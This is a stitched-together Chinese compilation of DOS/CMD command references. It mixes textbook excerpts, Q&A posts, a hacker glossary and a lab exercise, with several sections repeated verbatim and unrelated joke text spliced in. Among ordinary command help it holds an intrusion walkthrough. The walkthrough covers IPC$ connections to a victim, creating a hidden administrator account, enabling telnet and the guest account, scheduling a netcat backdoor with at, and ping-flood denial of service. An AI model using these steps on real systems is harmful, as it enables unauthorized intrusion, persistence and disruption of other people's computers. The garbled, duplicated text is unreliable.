/domain[:domainname]:指定要查看其可用计算机的域或工作组。如果省略DomainName ,/domain 将显示网络上的所有域或工作组名。
/network:nw :显示NetWare 网络上所有可用的服务器。如果指定计算机名,/network:nw 将通过NetWare 网络显示该计算机上的可用资源。也可以指定添加到系统中的其他网络。 下面是使用Net view 命令的常用范例。
net view \\production :查看由 \\Production 计算机共享的资源列表。
net view /network:nw \\marketing :查看NetWare 服务器\\Marketing 上的可用资源。
net view /domain:sales :查看sale 域或工作组中的计算机列表。
net view /network:nw :查看NetWare 网络中的所有服务器:
要查看计算机中的共享资源列表,只需要
输入命令net view \\china-20f6b5d2d ,然后按下Enter 键即可。
9. Net User 命令
Net User 命令用于增加/创建/改动用户帐户。该命令语法为:
net user
net user 黑客攻防入门与进阶 52 各参数的作用如下。 username:帐户名。 password:分配或改变密码。*进行密 码提示。 /domain:在一个域中执行。 /add:创建一个帐户。 /delete:删除一个帐户。 Options:指定Net User命令可以使用 的参数。 了解了Net User命令的语法和参数后,下 面通过实例介绍使用Net User命令建立一个普 通新用户的方法。 【例3-8】使用Net user命令创建一个普通用户。 打开命令提示符窗口,输入命令net user john 123 /add。 在该段命令中john是创建的用户名,123 是该用户密码。 按下 Enter键,显示“命令成功完成”文 本内容,表示成功创建一个名为John,密码为 123的普通用户。 10. Net Localgroup命令 Net Localgroup命令用于添加、显示或修 改本地组。使用不带参数的net localgroup命令 可以显示服务器和计算机本地组的名称。 Net Localgroup命令语法为: net localgroup [GroupName [/comment: "Text"]] [/domain] net localgroup [GroupName{/add [/com ment:"Text"] | /delete} [/domain]] net localgroup [GroupNameName[ ...]{/add | /delete} [/domain]] 其中各参数作用如下。 GroupName:指定要添加、扩展或删 除的本地组的名称。使用不带其他参 数的net localgroupGroup Name 显示 本地组中的用户或全局组列表。 /comment:" Text ":为新建或已经存在 的组添加注释。注释最多可以包含 256个字符。 /domain:在当前域的主域控制器上执 行操作。否则,操作将在本地计算机 上执行。 Name [ ...]:列出要从本地组中添加或 删除的一个或多个用户名或组名。 /add :向本地组中添加全局组名称或 者用户名。必须在使用此命令将用户 或全局组添加到本地组之前先为其 建立帐户。 /delete:从本地计算机组中删除组名 或用户名。 net help Command :显示指定net命令 的帮助。 下面列出了使用net localgroup的常用命令 和作用。 net localgroup :显示本地服务器上所 有本地组的列表。 net localgroup exec /add:可以将本地 组Exec添加到本地用户帐户数据库。 net localgroup exec /add /domain:可以 将本地组Exec添加到域用户帐户数 据库。 net localgroup exec stevev sales\ralphr jennyt /add:可以将现有用户帐户 黑客必学的DOS 命令 53 stevev 、ralphr(来自Sales 域)和jennyt 添加到本地计算机上的Exec 本地组。 net localgroup exec stevev ralphr jennyt /add /domain :可以将现有用户帐户stevev 、ralphr 和jennyt 添加到域中的 Exec 本地组。 net localgroup exec /comment:"The executive staff.":显示Exec 本地组中的用户。 3.3 批处理应用 使用批处理,可以自动执行大量的DOS 命令,进而能够帮助黑客大大提高攻击效率。下面将介绍有关批处理的应用。 3.3.1 检查指定端口开放状态 网络程序的运行必须开启网络端口,木马程序也不例外。通过检查系统中是否开放了某个木马程序使用的端口,可以判断出系统是否中了相应的木马程序。 启动【记事本】应用程序,输入如下内容。 @echo off Echo 正在检查系统中是否存在木马 Netstat –a –n >jc.txt Find jc.txt "7614">nul If %errorlevel%==0( Echo. Echo 系统中存在木马 Goto end ) Echo. Echo 系统中未发现木马 :end Del /q jc.txt>nul 保存文件为dd.bat ,打开命令提示符窗口,切换到批处理文件所在路径,输入dd.bat ,按下Enter 键,执行命令。 3.3.2 关闭默认共享 关闭默认共享一般是是使用编写注册表文件的方法来实现的。下面通过实例介绍如何在批处理文件中实现注册表文件的创建、调用和关闭,实现关闭默认共享操作。 【例3-9】使用批处理文件关闭默认共享。 教学视频 源文件 启动【记事本】应用程序,输入如下内容。 @echo off Echo Windows Registry Editor Version 5.00 ?dk.reg Echo 正在关闭默认共享 Echo [HEKY_LOCAL_MACHINE\SYSTME\CurrentC ontrolSet\Services\lanmanserver\parame ters]>>dk.reg Echo 黑客攻防入门与进阶 54 "AutoShareServer"=dword:00000000>>dk.reg Echo "AutoShareWks"=dword:00000000??dk.reg Echo Echo正在关闭共享 Echo. Echo[HKEY_LOCAL_MACHINE\SYSTEM\Curr entControlSet\Control\Lsa]>>dk.reg Echo "restrictanonymous"=dword:00000001>>dk.reg Echo已经关闭共享 Echo. Regedit/s dk.reg Del/q/f dk.reg>nul Echo. 保存文件为dd.bat。 打开命令提示符窗口,切换到批处理文 件所在路径,输入dd.bat,按下Enter键,执行 命令。 3.4上机练习 本章上机练习包括使用DOS命令获取对方的IP地址以及使用批处理文件处理垃圾文件,用户通过练习可以巩固本章知识。 3.4.1 通过QQ获取对方IP地址 【例3-10】使用Netstat命令,通过QQ获取对方 IP地址。 教学视频 源文件 登录QQ,打开命令提示符窗口,输入 Netstat命令,按下Enter键。 通过QQ给欲查看IP地址的QQ好友发 送一个文件。 当好友接收文件时,在命令提示符窗口 中输入命令netstat,按下Enter键,查看反馈信 息,其中新的IP地址就是对方的IP地址。 3.4.2 清理垃圾文件 【例3-11】使用批处理文件清除垃圾文件。 教学视频 源文件 启动【记事本】应用程序,输入以下 内容。 @echo off Echo正在清除_desktop.inf文件 Del c:\_desktop.ini/f/s/q/a windows XP cmd命令大全 一,ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。 -t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M 的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 -l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。 -n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。 说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如"ping IP -t -n 3",虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。 下面我们举个例子来说明一下具体用法。 这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说"初步判断"是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。 (小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix) 至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对 黑客术语大全 1,肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。 2,木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。 3,网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。 4,挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。 5,后门:这是一种形象的比喻,**者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是**者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是**者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。 通常大多数的特洛伊木马(Trojan Horse)程序都可以被**者用语制作后门(BackDoor)6,rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。 9,IPC$:是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 10.弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码) 11.默认共享:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬 盘的共享,因为加了"$"符号,所以看不到共享的托手图表,也成为隐藏共享。 12.shell:指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对 话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell 执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell 13.WebShell:WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执 行环境,也可以将其称做是一种网页后门。黑客在**了一个网站后,通常会将这些asp 或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell 有海阳ASP木马,Phpspy,c99shell等 14.溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有 黑客常用CMD命令大全 net user heibai lovechina /add 加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add 把他加入Administrator组 net start telnet 开对方的TELNET服务 net use z:\127.0.0.1c$ 映射对方的C盘 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net user guest /active:yes 将Guest用户激活 net user guest lovechina 把guest的密码改为lovechina net user 用户名/delete 删掉用户 net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00. net user guest/time:all表示没有时间限制. net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间,不是上网时间 net time \\127.0.0.1 得到对方的时间, get c:\index.htm d:\ 上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到 127.0.0.1的C盘 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数 /yes可取消确认信息net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 黑客常用的远程控制命令 1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 退出的命令是 net use \\127.0.0.1\ipc$ /delte 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- 下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功,那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z 盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。 net user guest /active:yes ---------------------- 这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! net user guest lovechina net命令果然强大啊! 2:at 一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 那么需要用AT命令,这里假设你已经登陆了那个服务器。 你首先要得到对方的时间, net time \\127.0.0.1 将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 at \\127.0.0.1 12:3 nc.exe 严志梁 这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 3:telnet 这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 4:FTP 它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个https://www.360docs.net/doc/f69879156.html,,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. Dos常用命令一: net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况,常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 黑客DOS命令或其它命令入侵他人电脑的具体步骤.txt会计说:“你晚点来领工资吧,我这没零钱。”你看得出我擦了粉吗?虽然你身上喷了古龙水,但我还是能隐约闻到一股人渣味儿。既宅又腐,前途未卜。既宅又腐,前途未卜。你被打胎后是怎么从垃圾桶里逃出来的?史上最神秘的部门:有关部门。不可否认,马赛克是这个世纪阻碍人类裸体艺术进步最大的障碍!黑客DOS命令或其它命令入侵他人电脑的具体步骤?_百度知道百度首页 | 百度知道 | 登录 新闻网页贴吧知道 MP3 图片视频百科 帮助设置 百度知道 > 电脑/网络 > 反病毒相关问题添加到搜藏已解决 黑客DOS命令或其它命令入侵他人电脑的具体步骤? 悬赏分:10 - 解决时间:2008-2-28 11:48 哪位大侠指教下~ 本人只会用一些软件和命令入侵,听说黑客不用工具的,非常想了解一个具体的步骤和方法.. 提问者: DYX211 - 见习魔法师二级最佳答案 IPC$入侵 一唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘 比较两张软盘的内容。如果没有指定参数,diskcomp 就使用当前驱动器来比较两张软盘。 “dos命令大全”https://www.360docs.net/doc/f69879156.html,“黑客网站大全” 语法 diskcomp [drive1:[drive2:]] 参数 drive1 指定包含其中一个软盘的驱动器。 drive2 指定包含其他软盘的驱动器。 /? 在命令提示符显示帮助。 注释 使用磁盘 diskcomp 命令只应用于软盘。diskcomp 命令不能用于硬盘。如果指定了drive1 或drive2 的硬盘驱动器,diskcomp 将显示以下错误消息: Invalid drive specification Specified drive does not exist or is nonremovable 比较磁盘 如果两个被比较的磁盘中所有磁道均相同,diskcomp 将显示下列消息: 比较无误。 如果磁道不同,diskcomp 将显示与下面类似的消息: Compare error on side 1, track 2 当diskcomp 完成比较时,它显示下列消息: Compare another diskette (Y/N)? 如果按“Y”,diskcopy 将提示插入用于下一次比较的磁盘。如果按“N”,diskcomp 将停止比较。 当diskcomp 进行比较时,它忽略磁盘的卷号。 省略驱动器参数 如果省略drive2 参数,diskcopy 将把当前驱动器作为drive2 驱动器。如果省略这两个驱动器参数,dis kcopy 将使用当前驱动器作为这两个参数。如果当前驱动器与drive1 相同,diskcomp 会提示您根据需要交换磁盘。 求常用DOS命令大全及其用法!!! 浏览次数:63883次悬赏分:0 |解决时间:2009-5-21 13:38 |提问者:雪枫之哀伤 越详细的越好~~~ 拜托了!!! 最佳答案 既然自己不愿搜,我就帮你搜吧 一,ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,出现如图1。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。 -t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 -l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。 -n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。 说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如“ping IP -t -n 3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping 主机域名,这样就可以得到主机的IP。 下面我们举个例子来说明一下具体用法,如图2。 这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。 (小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix) 一,ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /?回车,。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 -l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。 -n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。 说明一下,如果-t 参数和-n参数一起使用,ping命令就以放在后面的参数为标准,比如“ping IP -t -n 3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP. 下面我们举个例子来说明一下具体用法。 这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小.从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98. (小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix) 至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。 二,nbtstat 该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。 -a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。 -A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP. -n 列出本地机器的NETBIOS信息。 当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。 三,netstat 这是一个用来查看网络状态的命令,操作简便功能强大。 -a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4. 这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP. -r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP. 四,tracert 一、什么是DOS DOS是英文“Disk Operating System”的缩写,意思是磁盘操作系统。它与Windows一样都是属于操作系统,但没有Windows图形化用户界面。DOS系统属于单用户单任务操作系统,一次只能执行一个任务。不像Windows系统一样,可以一边复制文件、一边浏览网页。目前广泛使用的MS-DOS是美国微软公司买下DOS专利权后命名的,PC-DOS则是IBM 公司在推出IBM-PC机时,选定了MS-DOS作为基本操作系统,并将其改名为PC-DOS。MS-DOS与PC-DOS在本质上并没有太大的区别且命令是基本兼容的。DOS操作系统是通过输入命令来执行一些操作,所以当时想要学会使用DOS的用户还得对英文有一定的基础。自从DOS在1981年问世以来,版本就不断更新,从最初的DOS1.0升级到了最新的DOS8.0(Windows ME系统),纯DOS 的最高版本为DOS6.22,这以后的新版本DOS都是由Windows系统所提供的。自从Win95系统推出后,DOS系统就逐渐退出了市场,WinNT/2K/XP 中有个叫“命令提示符”(CMD,CMD的英文全称是“command”中文意思是“命令”。)的程序,表面看上去类似于Win3.x/9x中的MS-DOS窗口。然而,它们是完全不同的。CMD是32位应用程序,而DOS是16位操作系统。真正的DOS是MS-DOS、PC-DOS等纯DOS。不过我们常常会将Winxp下的CMD叫做“DOS”。这或许成了一种习惯,它可以说是DOS 的一种简化形式集成于Windows操作系统中。当然我们在Windows操作系统中使用的CMD 命令很多也是能在DOS下使用的,CMD有类似DOS系统的操作完成各种任务。 二、启动DOS的多种方法 在WinXP中如何启动我们的DOS命令行呢?其实方法是非常的多,这里就为大家讲解各种启动DOS命令行的方法。 第1种:.点击“开始菜单”——“运行”——输入“cmd”,即可进入我们的DOS命令行界面 第2种:.点击“开始菜单”——“运行”——输入“command”,可进入英文界面16位的DOS 程序中,但不能直接支持鼠标(即不能直接在窗口上点击鼠标,而cmd是可以的)。 第3种:点击“开始菜单”——“程序”——“附件”,在附件中找到“命令提示符”,单击即可打开进入DOS命令行 第4种:在桌面或文件夹中建立一个文本文件,里面输入“cmd.”,保存后缀为.cmd或是.bat格式的,双击打开也可以进入DOS命令行。 第5种:.打开C:WindowsSystem32目录,找到文件“cmd.exe”,双击它也可以打开DOS 命令行。 史上最全的局域网dos命令集 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup ***istrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务;(如:net start telnet,net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 实验二、常用Windows网络安全命令 一、实验目的 掌握通过ping程序、Tracert程序、netstate 程序、fport程序来了解本机和所在网络安全状况。 二、实验内容 (1)ping程序可用来测试一个主机是否处于活动状态、到达时间等。 (2)黑客可以通过ping指令,利用TTL(Time-to-Live,活动时间)值鉴别操作系统的类型、判断目标主机的类型,为了防止黑客通过该方法判断目标主机类型,可以通过修改注册表相关选项来改变TTL值。 (3)Tracert程序可以用来获取到达某一主机经过的网络及路由器列表。该程序可以直接通过命令行来完成。 (4)Netstat程序可以用来获取到达某一主机经过的网络及路由器列表。 (5)Fport 三、实验步骤 任务一、 Ping程序的使用 PING (Packet Internet Grope),因特网包探索器,用于测试网络连接量的程序。Ping发送一个ICMP回声请求消息给目的地并报告是否收到所希望的ICMP 回声应答。 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。 1, 使用Ping命令来验证连通性 开始——运行——cmd Ping 对方主机名或IP地址,如果联通,则返回信息。 2, 利用TTL返回值查看操作系统类型 若电脑虽然有问题但还能进入Windows, 1.请依次点击“开始→程序→ MS-DOS方式”,你还可以点击“开始→运行”,在打开的对话框里输入“command”(不带引号,下同)。若你的系统是Windows XP/2000,则输入“cmd”,同样可以进入DOS。 2.对于Windows 98系统,还可以点击“开始→关闭系统”,在出现的对话框中选择“重新启动计算机并切换到MS-DOS环境”,即可进入DOS。 3.在开机通过自检后,屏幕出现“Starting Windows 98…”的字样时,立即按下“F8”键,接着选择“Safe Mode Command Prompt Only”或“Command Prompt Only”,即可进入安全模式DOS或纯DOS。 4.系统崩溃了,重新启动计算机,按住Ctrl键,在出现的屏幕信息中选择“Safe Mode Command Prompt Only”或“Command Prompt Only”,即可进入安全模式DOS或纯DOS。 5.若无法进入Windows,重新启动计算机,进入CMOS,将BIOS中的第一启动顺序(1st Boot Device)改成软驱(Floppy),保存后插入系统盘即可。 DOS命令大全!!常用的有哪些呢? DOS:disk operate system,磁盘操作系统,DOS命令又分内部命令和外部命令。 内部命令又称为驻机命令,它是随着DOS系统的启动同时被加载到内存里且长驻内存。 也就是说,只要启动了DOS系统,我们就可以使用内部命令。 外部命令是储存在磁盘上的可执行文件,执行这些外部命令需要从磁盘将其文件调入内存,因此,外部命令只有该文件存在时才能使用。带有.COM、.EXE、.BAT等扩展名的文件都可看成是外部命令。 